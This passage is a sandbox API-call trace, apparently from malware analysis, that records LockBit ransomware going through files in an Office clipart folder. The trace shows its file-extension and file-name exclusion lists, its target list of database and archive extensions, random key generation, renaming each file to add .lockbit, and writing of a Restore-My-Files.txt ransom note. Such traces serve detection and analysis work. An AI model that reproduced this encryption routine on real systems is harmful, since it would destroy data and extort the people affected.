NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.499] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.499] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.502] free (_Block=0x1fa2ed8) [0177.502] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SWEST_01.MID" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.502] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.502] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.503] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7065e700, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7065e700, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x4f0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00110_.WMF", cAlternateFileName="")) returned 1 [0177.503] lstrcmpiW (lpString1=".", lpString2="SY00110_.WMF") returned -1 [0177.503] lstrcmpiW (lpString1="..", lpString2="SY00110_.WMF") returned -1 [0177.503] PathFindExtensionW (pszPath="SY00110_.WMF") returned=".WMF" [0177.503] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.503] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.504] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.504] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00110_.WMF") returned -1 [0177.505] lstrcmpiW (lpString1="ntldr", lpString2="SY00110_.WMF") returned -1 [0177.505] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00110_.WMF") returned -1 [0177.505] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00110_.WMF") returned -1 [0177.505] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00110_.WMF") returned -1 [0177.505] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00110_.WMF") returned 1 [0177.505] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00110_.WMF") returned -1 [0177.505] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.505] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00110_.WMF") returned=".WMF" [0177.505] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.505] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.505] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.506] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.506] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00110_.WMF.lockbit") returned 72 [0177.506] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00110_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00110_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0177.511] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.511] malloc (_Size=0x40068) returned 0x1ff1e60 [0177.511] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1264) returned 1 [0177.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.511] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.511] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0177.511] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.512] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.512] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0177.512] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0177.514] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00110_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00110_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.514] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.514] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.515] free (_Block=0x1fa2ed8) [0177.515] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00110_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.515] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.515] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.515] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb76ecf00, ftCreationTime.dwHighDateTime=0x1bd4b19, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xb76ecf00, ftLastWriteTime.dwHighDateTime=0x1bd4b19, nFileSizeHigh=0x0, nFileSizeLow=0x1844, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00127_.WMF", cAlternateFileName="")) returned 1 [0177.515] lstrcmpiW (lpString1=".", lpString2="SY00127_.WMF") returned -1 [0177.515] lstrcmpiW (lpString1="..", lpString2="SY00127_.WMF") returned -1 [0177.515] PathFindExtensionW (pszPath="SY00127_.WMF") returned=".WMF" [0177.515] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.515] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.515] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.515] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.515] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.515] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.516] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.516] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.517] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00127_.WMF") returned -1 [0177.517] lstrcmpiW (lpString1="ntldr", lpString2="SY00127_.WMF") returned -1 [0177.517] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00127_.WMF") returned -1 [0177.517] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00127_.WMF") returned -1 [0177.517] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00127_.WMF") returned -1 [0177.517] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00127_.WMF") returned 1 [0177.517] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00127_.WMF") returned -1 [0177.517] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.518] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00127_.WMF") returned=".WMF" [0177.518] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0177.518] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0177.518] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0177.519] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0177.519] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0177.519] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0177.519] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0177.519] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0177.519] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0177.519] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0177.519] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00127_.WMF.lockbit") returned 72 [0177.519] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00127_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\sy00127_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0177.520] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0177.520] malloc (_Size=0x40068) returned 0x3d70450 [0177.520] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=6212) returned 1 [0177.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.520] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.520] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0177.520] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0177.521] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0177.521] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0177.521] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0177.524] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00127_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00127_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0177.524] malloc (_Size=0xa6) returned 0x1fa2ed8 [0177.524] NtSetInformationFile (FileHandle=0x3cc, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0177.525] free (_Block=0x1fa2ed8) [0177.525] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SY00127_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0177.525] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0177.525] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0177.526] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb62ee00, ftCreationTime.dwHighDateTime=0x1bd4ae2, ftLastAccessTime.dwLowDateTime=0x6d43ce90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdb62ee00, ftLastWriteTime.dwHighDateTime=0x1bd4ae2, nFileSizeHigh=0x0, nFileSizeLow=0x81c, dwReserved0=0x0, dwReserved1=0x0, cFileName="SY00132_.WMF", cAlternateFileName="")) returned 1 [0177.526] lstrcmpiW (lpString1=".", lpString2="SY00132_.WMF") returned -1 [0177.526] lstrcmpiW (lpString1="..", lpString2="SY00132_.WMF") returned -1 [0177.526] PathFindExtensionW (pszPath="SY00132_.WMF") returned=".WMF" [0177.526] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0177.526] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0177.527] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0177.527] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="SY00132_.WMF") returned -1 [0177.527] lstrcmpiW (lpString1="ntldr", lpString2="SY00132_.WMF") returned -1 [0177.527] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="SY00132_.WMF") returned -1 [0177.527] lstrcmpiW (lpString1="bootsect.bak", lpString2="SY00132_.WMF") returned -1 [0177.527] lstrcmpiW (lpString1="autorun.inf", lpString2="SY00132_.WMF") returned -1 [0177.527] lstrcmpiW (lpString1="thumbs.db", lpString2="SY00132_.WMF") returned 1 [0177.527] lstrcmpiW (lpString1="iconcache.db", lpString2="SY00132_.WMF") returned -1 [0177.528] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0177.528] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft 